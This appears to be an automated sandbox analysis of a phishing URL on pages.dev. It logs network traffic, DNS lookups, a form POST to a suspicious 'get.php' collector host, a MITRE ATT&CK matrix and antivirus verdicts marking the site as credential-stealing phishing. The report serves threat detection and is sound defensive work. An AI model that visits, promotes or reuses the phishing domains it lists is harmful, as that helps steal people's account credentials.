Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/js/signup-fabric_en_hjnWUmfm-pOUxYXWMUv1Yw2.js HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.live.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/chunks/oneds-analytics-js_8c01a5c09df43fd8d323.js HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.live.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://signup.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/images/2_bc3d32a696895f78c19d.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://signup.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/js/signup-fabric_en_hjnWUmfm-pOUxYXWMUv1Yw2.js HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/images/2_bc3d32a696895f78c19d.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/chunks/oneds-analytics-js_8c01a5c09df43fd8d323.js HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ns?c=0d95f950-67ec-11ef-8c21-4b98fcd4657e HTTP/1.1Host: stk.hsprotect.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://msft.hsprotect.netSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://msft.hsprotect.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/v2/msft HTTP/1.1Host: collector-pxzc5j78di.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ns?c=0d95f950-67ec-11ef-8c21-4b98fcd4657e HTTP/1.1Host: stk.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/favicon.ico?v=2 HTTP/1.1Host: acctcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://signup.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/favicon.ico?v=2 HTTP/1.1Host: acctcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/v2/msft HTTP/1.1Host: collector-pxzc5j78di.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/v2/msft HTTP/1.1Host: collector-pxzc5j78di.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev
Source: global traffic	DNS traffic detected: DNS query: fetchlnk.truesharingzone.site
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev
Source: global traffic	DNS traffic detected: DNS query: theextrenalfiles.filesdistributorin.online
Source: global traffic	DNS traffic detected: DNS query: basicplan.filesdistributorin.online
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: signup.live.com
Source: global traffic	DNS traffic detected: DNS query: logincdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: fpt.live.com
Source: global traffic	DNS traffic detected: DNS query: msft.hsprotect.net
Source: global traffic	DNS traffic detected: DNS query: client.hsprotect.net
Source: global traffic	DNS traffic detected: DNS query: stk.hsprotect.net
Source: global traffic	DNS traffic detected: DNS query: collector-pxzc5j78di.hsprotect.net

Source: unknown

HTTP traffic detected: POST /get.php HTTP/1.1Host: fetchlnk.truesharingzone.siteConnection: keep-aliveContent-Length: 20sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/html, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 22:54:39 GMTContent-Length: 0Connection: closeAccess-Control-Allow-Origin: *Cache-Control: no-storereferrer-policy: strict-origin-when-cross-originReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QcBOsfsYs8PeYUCrKZ2Y9gYZGlIy2rfxNsPqrvrhLDPYQVwXL7h7QpSUTdFShD9ScIbhUZ%2B2yLOTDGIi2rnUall0A8LAMTfpMtaktOvzCYw0x0BvbR9TuUjPW1iBtEvb7H9nsVRO6RAlpW94Q8BS9VvltZt7k9U7r%2BDoFZ1QxvsNf9qAgTXs0y9rWXMDONa8WSAjQjpp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bc09a86cc6c425e-EWRalt-svc: h3=":443"; ma=86400

Source: chromecache_146.2.dr, chromecache_155.2.dr, chromecache_178.2.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js
Source: chromecache_172.2.dr	String found in binary or memory: https://client.hsprotect.net/PXzC5j78di/main.min.js
Source: chromecache_142.2.dr	String found in binary or memory: https://fpt.live.com/
Source: chromecache_176.2.dr	String found in binary or memory: https://login.microsoftonline.com
Source: chromecache_176.2.dr	String found in binary or memory: https://login.windows-ppe.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50607 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50607
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50608
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50608 version: TLS 1.2

Source: classification engine

Classification label: mal100.phis.win@25/79@46/15

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1996,i,7857939130896594004,14220038804681611000,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1996,i,7857939130896594004,14220038804681611000,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	100%	Avira URL Cloud	phishing
https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	11%	Virustotal		Browse
https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	100%	SlashNext	Credential Stealing type: Phishing & Social usering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
a.nel.cloudflare.com	0%	Virustotal		Browse
s-part-0039.t-0009.t-msedge.net	0%	Virustotal		Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal		Browse
fetchlnk.truesharingzone.site	12%	Virustotal		Browse
s-part-0045.t-0009.t-msedge.net	0%	Virustotal		Browse
palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev	0%	Virustotal		Browse
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	0%	Virustotal		Browse
sni1gl.wpc.alphacdn.net	0%	Virustotal		Browse
bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev	12%	Virustotal		Browse
s-part-0014.t-0009.t-msedge.net	0%	Virustotal		Browse
bg.microsoft.map.fastly.net	0%	Virustotal		Browse
www.google.com	0%	Virustotal		Browse
s-part-0016.t-0009.t-msedge.net	0%	Virustotal		Browse
s-part-0032.t-0009.t-msedge.net	0%	Virustotal		Browse
basicplan.filesdistributorin.online	2%	Virustotal		Browse
inbound-weighted.protechts.net	0%	Virustotal		Browse
client.hsprotect.net	0%	Virustotal		Browse
logincdn.msftauth.net	0%	Virustotal		Browse
collector-pxzc5j78di.hsprotect.net	0%	Virustotal		Browse
msft.hsprotect.net	0%	Virustotal		Browse
stk.hsprotect.net	0%	Virustotal		Browse
fpt.live.com	0%	Virustotal		Browse
signup.live.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://login.microsoftonline.com	0%	URL Reputation	safe
